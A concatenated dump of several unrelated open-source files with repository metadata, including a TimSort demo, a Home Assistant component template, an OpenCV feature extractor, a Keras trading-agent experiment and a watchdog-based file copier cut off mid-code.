last = arr[mid+1:end+1]
len1 = mid-start+1
len2 = end-mid
ind1 = 0
ind2 = 0
ind = start
while ind1 < len1 and ind2 < len2:
if first[ind1] < last[ind2]:
arr[ind] = first[ind1]
ind1 += 1
else:
arr[ind] = last[ind2]
ind2 += 1
ind += 1
while ind1 < len1:
arr[ind] = first[ind1]
ind1 += 1
ind += 1
while ind2 < len2:
arr[ind] = last[ind2]
ind2 += 1
ind += 1
return arr
def TimSort(arr):
n = len(arr)
minrun=GetMinrun(n)
for start in range(0, n, minrun):
end = min(start+minrun-1, n-1)
arr = InsSort(arr, start, end)
curr_size = minrun
while curr_size < n:
for start in range(0, n, curr_size*2):
mid = min(n-1, start+curr_size-1)
end = min(n-1, mid+curr_size)
arr = merge(arr, start, mid, end)
curr_size *= 2
return arr
a=[random.randint(0,60) for i in range(140)]
print('Исходный массив: ', a)
b=a
print('Python timsort: ',sorted(b))
print('My timsort:', TimSort(a))
|
[
"noreply@github.com"
] |
OlegLaiok.noreply@github.com
|
daf504ddb048bd9ff53c1be218bdef13eb0e3612
|
978d8f24f4985c61c2dce534a279abe6ffeff433
|
/custom_components/blueprint/__init__.py
|
7f90a41bded995d9a9e736289b3e45a104db0064
|
[
"MIT"
] |
permissive
|
JiriKursky/blueprint
|
3c1ad02c4726539ab07fc407b6c53ef4c903448b
|
92ae97dc5fec3a9a6e6e14031c32bbf2f1953ff6
|
refs/heads/master
| 2022-01-27T16:24:27.521422
| 2019-07-20T10:52:46
| 2019-07-20T10:52:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,577
|
py
|
"""
Component to integrate with blueprint.
For more details about this component, please refer to
https://github.com/custom-components/blueprint
"""
import os
from datetime import timedelta
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import discovery
from homeassistant.util import Throttle
from .const import (
CONF_BINARY_SENSOR,
CONF_ENABLED,
CONF_NAME,
CONF_PASSWORD,
CONF_SENSOR,
CONF_SWITCH,
CONF_USERNAME,
DEFAULT_NAME,
DOMAIN_DATA,
DOMAIN,
ISSUE_URL,
PLATFORMS,
REQUIRED_FILES,
STARTUP,
VERSION,
)
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=30)
_LOGGER = logging.getLogger(__name__)
BINARY_SENSOR_SCHEMA = vol.Schema(
{
vol.Optional(CONF_ENABLED, default=True): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
SENSOR_SCHEMA = vol.Schema(
{
vol.Optional(CONF_ENABLED, default=True): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
SWITCH_SCHEMA = vol.Schema(
{
vol.Optional(CONF_ENABLED, default=True): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_BINARY_SENSOR): vol.All(
cv.ensure_list, [BINARY_SENSOR_SCHEMA]
),
vol.Optional(CONF_SENSOR): vol.All(cv.ensure_list, [SENSOR_SCHEMA]),
vol.Optional(CONF_SWITCH): vol.All(cv.ensure_list, [SWITCH_SCHEMA]),
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up this component."""
# Import client from a external python package hosted on PyPi
from sampleclient.client import Client
# Print startup message
startup = STARTUP.format(name=DOMAIN, version=VERSION, issueurl=ISSUE_URL)
_LOGGER.info(startup)
# Check that all required files are present
file_check = await check_files(hass)
if not file_check:
return False
# Create DATA dict
hass.data[DOMAIN_DATA] = {}
# Get "global" configuration.
username = config[DOMAIN].get(CONF_USERNAME)
password = config[DOMAIN].get(CONF_PASSWORD)
# Configure the client.
client = Client(username, password)
hass.data[DOMAIN_DATA]["client"] = BlueprintData(hass, client)
# Load platforms
for platform in PLATFORMS:
# Get platform specific configuration
platform_config = config[DOMAIN].get(platform, {})
# If platform is not enabled, skip.
if not platform_config:
continue
for entry in platform_config:
entry_config = entry
# If entry is not enabled, skip.
if not entry_config[CONF_ENABLED]:
continue
hass.async_create_task(
discovery.async_load_platform(
hass, platform, DOMAIN, entry_config, config
)
)
return True
class BlueprintData:
"""This class handle communication and stores the data."""
def __init__(self, hass, client):
"""Initialize the class."""
self.hass = hass
self.client = client
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def update_data(self):
"""Update data."""
# This is where the main logic to update platform data goes.
try:
data = self.client.get_data()
self.hass.data[DOMAIN_DATA]["data"] = data
except Exception as error: # pylint: disable=broad-except
_LOGGER.error("Could not update data - %s", error)
async def check_files(hass):
"""Return bool that indicates if all files are present."""
# Verify that the user downloaded all files.
base = "{}/custom_components/{}/".format(hass.config.path(), DOMAIN)
missing = []
for file in REQUIRED_FILES:
fullpath = "{}{}".format(base, file)
if not os.path.exists(fullpath):
missing.append(file)
if missing:
_LOGGER.critical("The following files are missing: %s", str(missing))
returnvalue = False
else:
returnvalue = True
return returnvalue
|
[
"joasoe@gmail.com"
] |
joasoe@gmail.com
|
30e28adb243535de755e4dcd07f8c888edccef39
|
e89fafe220e0ae4a11e542e5f59f7340a6045854
|
/ValidationData.py
|
a78b21d02a14ff9430cbc88bc7e453eb790cb3aa
|
[] |
no_license
|
jvsd/AOR
|
5c389be6d4de887f454933254b0c2c03dfdf8924
|
9389e3ed5b061cf7829b87a2a44f4a824e0330d2
|
refs/heads/master
| 2016-09-06T19:32:53.679543
| 2012-03-02T09:42:54
| 2012-03-02T09:42:54
| 3,600,062
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,434
|
py
|
from numpy import *
from matplotlib.pyplot import *
import time
from sklearn import decomposition, svm
#from scikits.learn import datasets
#from scikits.learn import decomposition
#from scikits.learn.decomposition import pca
import cv
import Image
#Used to get validation data from an image
def GetData(src):
xt = 200
yt = 200
xo = 400
yo = 2700
number = 30
targets = zeros(number)
cropped = [None]*number
for i in range(0,number):
cropped[i] = cv.CreateImage((400,400) , cv.IPL_DEPTH_8U, 3)
cv.SetImageROI(src,(xo,yo,400,400))
cv.Copy(src,cropped[i], None)
cv.ResetImageROI(src)
cv.ShowImage("Test",cropped[i])
key = cv.WaitKey(0)
#var = input("True or false?")
if (ord('0') == key):
print 'Mark True'
else:
print 'Mark False'
targets[i] = 1
if xo == 8000-400:
xo = 0
yo = yt+yo
else:
xo = xo+xt
return cropped,targets
def shuffle_unison(a, b):
rng_state = random.get_state()
random.shuffle(a)
random.set_state(rng_state)
random.shuffle(b)
def getObjectFeatures(image,targetsin):
size = (image.width, image.height)
data = image.tostring()
im1 = Image.fromstring("RGB",size,data)
#Rotating an image using PIL
rim1 = im1.rotate(72)
rim2 = im1.rotate(72*2)
rim3 = im1.rotate(72*3)
rim4 = im1.rotate(72*4)
rim5 = im1
cvrim=[None]*5
cvrim[0] = cv.CreateImageHeader(rim1.size, cv.IPL_DEPTH_8U, 3)
cv.SetData(cvrim[0], rim1.tostring())
cvrim[1] = cv.CreateImageHeader(rim2.size, cv.IPL_DEPTH_8U, 3)
cv.SetData(cvrim[1], rim2.tostring())
cvrim[2] = cv.CreateImageHeader(rim3.size, cv.IPL_DEPTH_8U, 3)
cv.SetData(cvrim[2], rim3.tostring())
cvrim[3] = cv.CreateImageHeader(rim4.size, cv.IPL_DEPTH_8U, 3)
cv.SetData(cvrim[3], rim4.tostring())
cvrim[4] = cv.CreateImageHeader(rim5.size, cv.IPL_DEPTH_8U, 3)
cv.SetData(cvrim[4], rim5.tostring())
#rim1.show()
#cv.ShowImage("test",cvrim[0])
#cv.WaitKey()
#im = cv.LoadImageM('/Users/jamesd/Desktop/test.jpg',cv.CV_LOAD_IMAGE_GRAYSCALE)
#im2 = cv.LoadImage('/Users/jamesd/Desktop/test.jpg')
bwcvrim = [None]*5
testset = [None]*25
data =[None]*25
for i in range(0,5):
#tic = time.clock()
bwcvrim[i] = cv.CreateImage((cvrim[i].width,cvrim[i].height) , cv.IPL_DEPTH_8U, 1)
#cv.CvtColor(cvrim[i],bwcvrim[i], cv.CV_RGB2GRAY)
cv.Split(cvrim[i],None,None,bwcvrim[i],None)
cv.Threshold(bwcvrim[i],bwcvrim[i],60,255,cv.CV_THRESH_BINARY_INV)
for b in range(0,5):
temp = i*5
testset[b+temp] = cv.CreateImage((bwcvrim[i].width,bwcvrim[i].height) , cv.IPL_DEPTH_8U, 1)
adj = array([5,15,25,35,45])
cv.Smooth(bwcvrim[i],testset[b+temp],cv.CV_GAUSSIAN,adj[b],5)
cv.ShowImage("test",testset[b+temp])
cv.WaitKey()
(keypoints, descriptors) = cv.ExtractSURF(testset[b+temp],None,cv.CreateMemStorage(),(0,1,3,1))
if (len(keypoints) < 10):
keypoints = [None]*10
for x in range(0,10):
keypoints[x] = zeros(69)
else:
for x in range(0,len(keypoints)):
keypoints[x] = keypoints[x] + tuple(descriptors[x])
data[b+temp] = keypoints
keypoints = [None]
#print descriptors[0]
#data[b+temp] =
#keypoints[0] = keypoints[0] + descriptors[0]
#print keypoints[0].append(descriptors[0])
datapca = [None]*25
dataout = [None]*25
for i in range(0,25):
sortby = "hessian"
#keypoints[i].sort(key=itemgetter(sortby))
temp = data[i]
#print temp
data[i] = sorted(temp, key = lambda out: out[4])
data[i].reverse()
datapca[i] = data[i][0:10]
#print datapca[0][9][4:]
dataout[i] = datapca[i][0][5:] + datapca[i][1][5:] + datapca[i][2][5:] + datapca[i][3][5:] + datapca[i][4][5:] + datapca[i][5][5:] + datapca[i][6][5:] + datapca[i][7][5:] + datapca[i][8][5:] + datapca[i][9][5:]
if (len(dataout[i]) < 640):
dataout[i] = zeros(640)
datax = asarray(dataout)
#print 'length'
#print len(datax[2])
datatemp = zeros((25,640))
for i in range(0,25):
#print i
datatemp[i] = datax[i][0:]
temptarget = [targetsin]*25
return datatemp,temptarget
source = 'Data/MLtest3.jpg'
src = cv.LoadImage(source, cv.CV_LOAD_IMAGE_UNCHANGED)
#im1 = Image.open(source)
#im2 = Image.open('/Users/jamesd/Desktop/5_5.jpg')
#test = Image.open('/Users/jamesd/Desktop/6.jpg')
testsource = 'Data/test.png'
#test = cv.LoadImage(testsource, cv.CV_LOAD_IMAGE_UNCHANGED)
#data1 = getObjectFeatures(im1,5)
#data2 = getObjectFeatures(im2,5)
#test1 = getObjectFeatures(test,5)
#test1 = asarray(test1)
#target = [1]*25
#target = [0]*25 + target
#targettest=[0]*25
#targettest=asarray(targettest)
#print shape(data1) #
#data = concatenate((data1,data2))
#target = asarray(target)
(cropped,targets) = GetData(src)
data =[]
target = [None]
print len(cropped)
print targets.shape
print type(cropped)
for i in range(0,len(cropped)):
print i
input = targets[i]
if (i == 0):
(data,target) = getObjectFeatures(cropped[i],input)
else:
(tempdata,temptargets) = getObjectFeatures(cropped[i],input)
data = concatenate((data,tempdata))
target = concatenate((target,temptargets))
#shuffle_unison(data,target)
#print target
save('Data/dataTemp.npy',data)
save('Data/targetTemp.npy',target)
#datatemp = asarray(datatemp)
#datatemp = ([datatemp,datatemp[0:]])
#print data.shape
#tic = time.clock()
#clf = svm.SVC()
#clf.fit(data, target)
#toc = time.clock()
#print "Time to Train..."
#print toc-tic
#print clf.score(test1,targettest)
#for i in range(0,25):
# print clf.predict(test1[i])
#for i in range(0,len(keypoints)-1):
# point = keypoints[i][0]
#print keypoints[i]
# cv.Circle(im2,point,35,(0,0,255,0),1,8,0)
#cv.SaveImage('/Users/jamesd/Desktop/testout.jpg',im2)
#print descriptors[3]
#print toc-tic
|
[
"jamesd2@email.arizona.edu"
] |
jamesd2@email.arizona.edu
|
c7da1a7b1f344da46059afb5af64ce7a6b8cdca0
|
207fa9b8e324506575899a1a4c53d9f60d7020b6
|
/negocios/migrations/0010_auto_20170523_1610.py
|
826a55fafb273a3115dafcc1cc875449f84ffaf4
|
[] |
no_license
|
diegomjasso/MyWashCar
|
fa11ec6a84ae17a112ed8a5c191bc85a9c21109c
|
570317aa8cbe0672f336eee01bcac0c5bfa7ae1b
|
refs/heads/master
| 2021-01-19T10:23:02.389550
| 2017-06-16T03:08:42
| 2017-06-16T03:08:42
| 87,857,582
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 484
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-05-23 21:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('negocios', '0009_auto_20170519_1053'),
]
operations = [
migrations.AlterField(
model_name='carwash',
name='logo',
field=models.ImageField(upload_to='static/assets/images/logoCarwash/'),
),
]
|
[
"rogelio.ortiz@softtek.com"
] |
rogelio.ortiz@softtek.com
|
921a1439c4b41746c803c1027e09f0d1502c2b93
|
55dc6e337e634acb852c570274a1d0358b7300a5
|
/tests/core/intz/intz.py
|
32ff67f7a362dffe3e6e8699ccb651f1b494c791
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
fifoteam/veriloggen
|
97ad45671f053c85f495b08a030f735fd9822146
|
23cb7251c0f126d40d249982cad33ef37902afef
|
refs/heads/master
| 2020-05-27T00:28:37.575411
| 2017-02-20T01:47:00
| 2017-02-20T01:47:00
| 82,518,602
| 2
| 0
| null | 2017-02-20T05:02:37
| 2017-02-20T05:02:37
| null |
UTF-8
|
Python
| false
| false
| 989
|
py
|
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
# the next line can be removed after installation
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from veriloggen import *
def mkLed():
m = Module('blinkled')
width = m.Parameter('WIDTH', 8)
clk = m.Input('CLK')
rst = m.Input('RST')
led = m.OutputReg('LED', width)
count = m.Reg('count', 32)
m.Always(Posedge(clk))(
If(rst)(
count(0)
).Else(
If(count == 1023)(
count(0)
).Else(
count(count + 1)
)
))
m.Always(Posedge(clk))(
If(rst)(
led(0)
).Else(
If(count == 1024 - 1)(
led(IntZ())
)
))
return m
if __name__ == '__main__':
led = mkLed()
verilog = led.to_verilog('')
print(verilog)
|
[
"shta.ky1018@gmail.com"
] |
shta.ky1018@gmail.com
|
5ba6efeb55d7d6654d6594edbbbc36ac84938f00
|
1cf71a4b1c45f622376fd096cabb97052d682a2c
|
/src/sample/note.py
|
e09834fcf8e12ef33bbbdc32c7ee81870fd9ad5e
|
[
"MIT"
] |
permissive
|
TestowanieAutomatyczneUG/laboratorium-10-marekpolom
|
9b1c8966a73b29f3961f0f76bb56c9f7819c3483
|
ba50ce33735827862d1d432e4348af6fce84ca5c
|
refs/heads/master
| 2023-01-28T22:43:27.776778
| 2020-12-08T16:05:57
| 2020-12-08T16:05:57
| 319,340,368
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 755
|
py
|
import re
class Note():
def __init__(self, name, note):
try:
if name == None:
raise Exception('Name can\'t be None')
if not re.search('^[^\s]*$', str(name)):
raise Exception('Name can\'t be empty!')
self.name = str(name)
except ValueError:
raise Exception('Value must be string!')
try:
if not (float(note) >= 2 and float(note) <= 6):
raise Exception('Value must be >= 2 and <= 6')
self.note = float(note)
except ValueError:
raise Exception('Value must be float')
def getName(self):
return self.name
def getNote(self):
return self.note
|
[
"marekpolom22@gmail.com"
] |
marekpolom22@gmail.com
|
83e4a2529c173ab183b0643cb5ba43df7aac40b2
|
be0abf6c8027b27407eb5272570c7cd262a74795
|
/ex3-self_learning_quant1.py
|
42bd4d0c7e25f268ee7b2392521002376a2c8e40
|
[
"MIT"
] |
permissive
|
jehung/sl-quant
|
70d032c78acd13a71b499d2ffe0fbb2a0a0bc325
|
b1eebfa5721dd43171a762b77b1dda180d28b869
|
refs/heads/master
| 2021-08-15T20:04:05.651975
| 2017-11-18T06:52:27
| 2017-11-18T06:52:27
| 109,555,098
| 0
| 1
| null | 2017-11-05T05:43:37
| 2017-11-05T05:43:37
| null |
UTF-8
|
Python
| false
| false
| 13,997
|
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import numpy as np
np.random.seed(1335) # for reproducibility
np.set_printoptions(precision=5, suppress=True, linewidth=150)
import pandas as pd
import backtest as twp
from matplotlib import pyplot as plt
from sklearn import metrics, preprocessing
from talib.abstract import *
from sklearn.externals import joblib
import quandl
import random, timeit
from sklearn import preprocessing
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.layers.recurrent import LSTM
from keras.optimizers import RMSprop, Adam
'''
Name: The Self Learning Quant, Example 3
Author: Daniel Zakrisson
Created: 30/03/2016
Copyright: (c) Daniel Zakrisson 2016
Licence: BSD
Requirements:
Numpy
Pandas
MatplotLib
scikit-learn
TA-Lib, instructions at https://mrjbq7.github.io/ta-lib/install.html
Keras, https://keras.io/
Quandl, https://www.quandl.com/tools/python
backtest.py from the TWP library. Download backtest.py and put in the same folder
/plt create a subfolder in the same directory where plot files will be saved
'''
#Load data
def read_convert_data(symbol='XBTEUR'):
if symbol == 'XBTEUR':
prices = quandl.get("BCHARTS/KRAKENEUR")
prices.to_pickle('XBTEUR_1day.pkl') # a /data folder must exist
if symbol == 'EURUSD_1day':
#prices = Quandl.get("ECB/EURUSD")
prices = pd.read_csv('EURUSD_1day.csv',sep=",", skiprows=0, header=0, index_col=0, parse_dates=True, names=['ticker', 'date', 'time', 'open', 'low', 'high', 'close'])
prices.to_pickle('EURUSD_1day.pkl')
print(prices)
return
def load_data(test=False):
#prices = pd.read_pickle('data/OILWTI_1day.pkl')
#prices = pd.read_pickle('data/EURUSD_1day.pkl')
#prices.rename(columns={'Value': 'close'}, inplace=True)
prices = pd.read_pickle('XBTEUR_1day.pkl')
prices.rename(columns={'Open': 'open', 'High': 'high', 'Low': 'low', 'Close': 'close', 'Volume (BTC)': 'volume'}, inplace=True)
#print(prices)
x_train = prices.iloc[-2000:-300,]
x_test= prices.iloc[-2000:,]
if test:
return x_test
else:
return x_train
#Initialize first state, all items are placed deterministically
def init_state(indata, test=False):
close = indata['close'].values
diff = np.diff(close)
diff = np.insert(diff, 0, 0)
sma15 = SMA(indata, timeperiod=15)
sma60 = SMA(indata, timeperiod=60)
rsi = RSI(indata, timeperiod=14)
atr = ATR(indata, timeperiod=14)
#--- Preprocess data
xdata = np.column_stack((close, diff, sma15, close-sma15, sma15-sma60, rsi, atr))
xdata = np.nan_to_num(xdata)
if test == False:
scaler = preprocessing.StandardScaler()
xdata = np.expand_dims(scaler.fit_transform(xdata), axis=1)
joblib.dump(scaler, 'scaler.pkl')
elif test == True:
scaler = joblib.load('scaler.pkl')
xdata = np.expand_dims(scaler.fit_transform(xdata), axis=1)
state = xdata[0:1,0:1, :]
return state, xdata, close
#Take Action
def take_action(state, xdata, action, signal, time_step):
#this should generate a list of trade signals that at evaluation time are fed to the backtester
#the backtester should get a list of trade signals and a list of price data for the assett
#make necessary adjustments to state and then return it
time_step += 1
#if the current iteration is the last state ("terminal state") then set terminal_state to 1
if time_step + 1 == xdata.shape[0]:
state = xdata[time_step-1:time_step, 0:1, :]
terminal_state = 1
signal.loc[time_step] = 0
return state, time_step, signal, terminal_state
#move the market data window one step forward
state = xdata[time_step-1:time_step, 0:1, :]
#take action
if action == 1:
signal.loc[time_step] = 100
elif action == 2:
signal.loc[time_step] = -100
else:
signal.loc[time_step] = 0
#print(state)
terminal_state = 0
#print(signal)
return state, time_step, signal, terminal_state
#Get Reward, the reward is returned at the end of an episode
def get_reward_value_iter(new_state, time_step, action, xdata, signal, terminal_state, epoch, eval=False):
rewards = np.empty(7)
signal.fillna(value=0, inplace=True)
if eval == False:
bt = twp.Backtest(pd.Series(data=[x for x in xdata[time_step-2:time_step]],
index=signal[time_step-2:time_step].index.values),
signal[time_step-2:time_step], signalType='shares')
reward = ((bt.data['price'].iloc[-1] - bt.data['price'].iloc[-2])*bt.data['shares'].iloc[-1])
rewards.fill(reward)
if terminal_state == 1 and eval == True:
#save a figure of the test set
bt = twp.Backtest(pd.Series(data=[x for x in xdata], index=signal.index.values), signal, signalType='shares')
reward = bt.pnl.iloc[-1]
rewards.fill(reward)
plt.figure(figsize=(3,4))
bt.plotTrades()
plt.axvline(x=400, color='black', linestyle='--')
plt.text(250, 400, 'training data')
plt.text(450, 400, 'test data')
plt.suptitle(str(epoch))
plt.savefig('plt/'+'value_iter_'+str(epoch)+'.png', bbox_inches='tight', pad_inches=1, dpi=72)
plt.close('all')
print(time_step, terminal_state, eval, rewards)
return rewards
def evaluate_Q(eval_data, eval_model, price_data, epoch=0):
#This function is used to evaluate the performance of the system each epoch, without the influence of epsilon and random actions
signal = pd.Series(index=np.arange(len(eval_data)))
state, xdata, price_data = init_state(eval_data)
status = 1
terminal_state = 0
time_step = 1
while(status == 1):
#We start in state S
qval = eval_model.predict(state, batch_size=batch_size)
action = (np.argmax(qval))
#Take action, observe new state S'
new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
#Observe reward
eval_reward = get_reward_value_iter(new_state, time_step, action, price_data, signal, terminal_state, eval=True, epoch=epoch)
state = new_state
if terminal_state == 1: #terminal state
status = 0
return eval_reward
def value_iter(eval_data, reward, epsilon, epoch=0):
signal = pd.Series(index=np.arange(len(eval_data)))
state, xdata, price_data = init_state(eval_data)
print(state.shape)
status = 1
terminal_state = 0
time_step = 14
while (status == 1):
# We start in state S
# Run the Q function on S to get predicted reward values on all the possible actions
#qval = np.dot(preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),xdata.reshape(7, -1))
qval = np.dot(
preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
rewards)
action = (np.argmax(qval))
new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
# Observe reward
eval_reward = get_reward_value_iter(new_state, time_step, action, price_data, signal, terminal_state, eval=True, epoch=epoch)
# Take action, observe new state S'
state = new_state
if terminal_state == 1: # terminal state
status = 0
return eval_reward
def policy_iter():
pass
indata = load_data(test=True)
state, xdata, price_data = init_state(indata, test=True)
print('state')
print(state.shape)
print(state)
print()
print('xdata')
print(xdata.shape)
print(xdata)
print()
print('price_data')
print(price_data.shape)
print(price_data)
if __name__ == "__main__":
#This neural network is the the Q-function, run it like this:
#model.predict(state.reshape(1,64), batch_size=1)
batch_size = 7
num_features = 7
epochs = 10
gamma = 0.95 # since the reward can be several time steps away, make gamma high
epsilon = 1
batchSize = 100
buffer = 200
replay = []
learning_progress = []
model = Sequential()
model.add(LSTM(64,
input_shape=(1, num_features),
return_sequences=True,
stateful=False))
model.add(Dropout(0.5))
model.add(LSTM(64,
input_shape=(1, num_features),
return_sequences=False,
stateful=False))
model.add(Dropout(0.5))
model.add(Dense(7, init='lecun_uniform'))
model.add(Activation('linear')) #linear output so we can have range of real-valued outputs
rms = RMSprop()
adam = Adam()
model.compile(loss='mse', optimizer=adam)
start_time = timeit.default_timer()
#read_convert_data(symbol='XBTEUR') #run once to read indata, resample and convert to pickle
indata = load_data()
test_data = load_data(test=True)
#stores tuples of (S, A, R, S')
h = 0
#signal = pd.Series(index=market_data.index)
signal = pd.Series(index=np.arange(len(indata)))
for i in range(epochs):
if i == epochs-1: #the last epoch, use test data set
indata = load_data(test=True)
state, xdata, price_data = init_state(indata, test=True)
else:
state, xdata, price_data = init_state(indata)
status = 1
terminal_state = 0
time_step = 14
rewards = get_reward_value_iter(state, time_step, 0, price_data, signal, terminal_state, i)
#while game still in progress
while(status == 1):
#We are in state S
#Let's run our Q function on S to get Q values for all possible actions
print('epoch ' + str(i))
#qval = np.dot(
# preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
# xdata.reshape(7, -1))
qval = np.dot(
preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
rewards)
if (random.random() < epsilon): #choose random action
action = np.random.randint(0,3) #assumes 4 different actions
else: #choose best action from Q(s,a) values
action = (np.argmax(qval))
#Take action, observe new state S'
new_state, time_step, signal, terminal_state = take_action(state, xdata, action, signal, time_step)
#Observe reward
rewards = get_reward_value_iter(new_state, time_step, action, price_data, signal, terminal_state, eval=True, epoch=i)
#Experience replay storage
if (len(replay) < buffer): #if buffer not filled, add to it
replay.append((state, action, rewards, new_state))
#print(time_step, reward, terminal_state)
else: #if buffer full, overwrite old values
if (h < (buffer-1)):
h += 1
else:
h = 0
replay[h] = (state, action, rewards, new_state)
#randomly sample our experience replay memory
minibatch = random.sample(replay, batchSize)
X_train = []
y_train = []
for memory in minibatch:
#Get max_Q(S',a)
old_state, action, rewards, new_state = memory
old_qval = model.predict(old_state, batch_size=batch_size)
newQ = np.dot(
#preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
#xdata.reshape(7, -1))
preprocessing.normalize(state.reshape(state.shape[0], -1), norm='l2', axis=0).reshape(state.shape),
rewards)
maxQ = np.max(newQ)
y = np.zeros((1,7))
y[:] = old_qval[:]
if terminal_state == 0: #non-terminal state
update = (np.max(rewards) + (gamma * maxQ))
else: #terminal state
update = np.max(rewards)
y[0][action] = update
#print(time_step, reward, terminal_state)
X_train.append(old_state)
y_train.append(y.reshape(7,))
X_train = np.squeeze(np.array(X_train), axis=(1))
y_train = np.array(y_train)
model.fit(X_train, y_train, batch_size=batchSize, nb_epoch=1, verbose=0)
state = new_state
if terminal_state == 1: #if reached terminal state, update epoch status
status = 0
#eval_reward = evaluate_Q(test_data, model, price_data, i)
eval_reward = value_iter(test_data, rewards, epsilon, epoch=epochs)
learning_progress.append((eval_reward))
print("Epoch #: %s Reward: %f Epsilon: %f" % (i,np.max(eval_reward), epsilon))
#learning_progress.append((reward))
if epsilon > 0.1: #decrement epsilon over time
epsilon -= (1.0/epochs)
elapsed = np.round(timeit.default_timer() - start_time, decimals=2)
print("Completed in %f" % (elapsed,))
bt = twp.Backtest(pd.Series(data=[x[0,0] for x in xdata]), signal, signalType='shares')
bt.data['delta'] = bt.data['shares'].diff().fillna(0)
print(bt.data)
unique, counts = np.unique(filter(lambda v:v==v,signal.values), return_counts=True)
print(np.asarray((unique, counts)).T)
plt.figure()
plt.subplot(3,1,1)
bt.plotTrades()
plt.subplot(3,1,2)
bt.pnl.plot(style='x-')
plt.subplot(3,1,3)
plt.plot(learning_progress)
plt.savefig('plt/value_iter_summary'+'.png', bbox_inches='tight', pad_inches=1, dpi=72)
#plt.show()
|
[
"jehung@me.com"
] |
jehung@me.com
|
39d136944a76de3a92cde68edd3581533364e3f0
|
127fa080496be33be7ac47b0125b8f8b94acf9b1
|
/LocalWindows_May2021/PycharmProjects - ee361/Test/venv/Scripts/easy_install-3.6-script.py
|
6bf49a4e98cf81e51e22f628d564929b3f93d9fd
|
[] |
no_license
|
pschmid1818/Clarkson-School-Projects
|
53d1ce7c3d62bae34835d5bae78936ea6fe0109b
|
88e1e01fa0e512a1f1aaa78882e659682e271672
|
refs/heads/master
| 2023-05-05T14:30:45.156017
| 2021-06-01T03:33:13
| 2021-06-01T03:33:13
| 372,693,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
#!C:\Users\Schmid\PycharmProjects\Test\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.6')()
)
|
[
"schmidp@clarkson.edu"
] |
schmidp@clarkson.edu
|
792ad6eb3efb07738f5be34185c1d02e94374ee1
|
fedcfedd334adfca79259cdf1c2366b522dfe07e
|
/watcher2.py
|
f95870c13ae6c015105751a25756aeab27b31895
|
[] |
no_license
|
Zuya14/watcher
|
3d326b6814f62067f472e438aa271e92d6db941e
|
f6ed00ac3d35f452f04dea3fbdcb0b30ebd8d707
|
refs/heads/main
| 2023-07-22T18:21:00.027114
| 2021-09-01T00:52:27
| 2021-09-01T00:52:27
| 399,185,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,522
|
py
|
from watchdog.events import PatternMatchingEventHandler
from watchdog.observers import Observer
import os
import time
import csv
import shutil
class FileChangeHandler(PatternMatchingEventHandler):
def __init__(self, patterns, copy_path, degs, margin_time):
super(FileChangeHandler, self).__init__(patterns=patterns)
self.copy_path = copy_path
self.finish = False
self.degs = degs
self.old_time = -1
self.margin_time = margin_time
self.count = 0
self.is_copied = True
# time.sleep(1)
def on_created(self, event):
self.old_time = time.time()
self.is_copied = False
def on_modified(self, event):
self.old_time = time.time()
self.is_copied = False
def on_deleted(self, event):
pass
def on_moved(self, event):
pass
def check_update(self):
if self.old_time == -1:
self.old_time = time.time()
else:
now = time.time()
is_update = (now - self.old_time >= self.margin_time)
if is_update:
self.copy_all_files()
def copy_all_files(self):
if self.count < len(self.degs) and (not self.is_copied):
path_deg = (self.copy_path+'/{:d}'.format(self.degs[self.count]))
if not os.path.exists(path_deg):
os.makedirs(path_deg)
for src_path in self.patterns:
save_path = path_deg+'/{:s}'.format(os.path.basename(src_path))
shutil.copyfile(src_path, save_path)
print("save: {:s}".format(save_path))
self.is_copied = True
self.count += 1
def check_finish(self):
return self.count >= len(self.degs)
if __name__ == "__main__":
###### read parameter.csv ######
restartFlag = True
while restartFlag:
param = {}
if not os.path.exists('./parameter.csv'):
print("can't find parameter.csv")
time.sleep(3)
exit()
with open('./parameter.csv') as f:
reader = csv.reader(f, skipinitialspace=True)
for row in reader:
if row[0] == 'copy_path':
param[row[0]] = row[1]
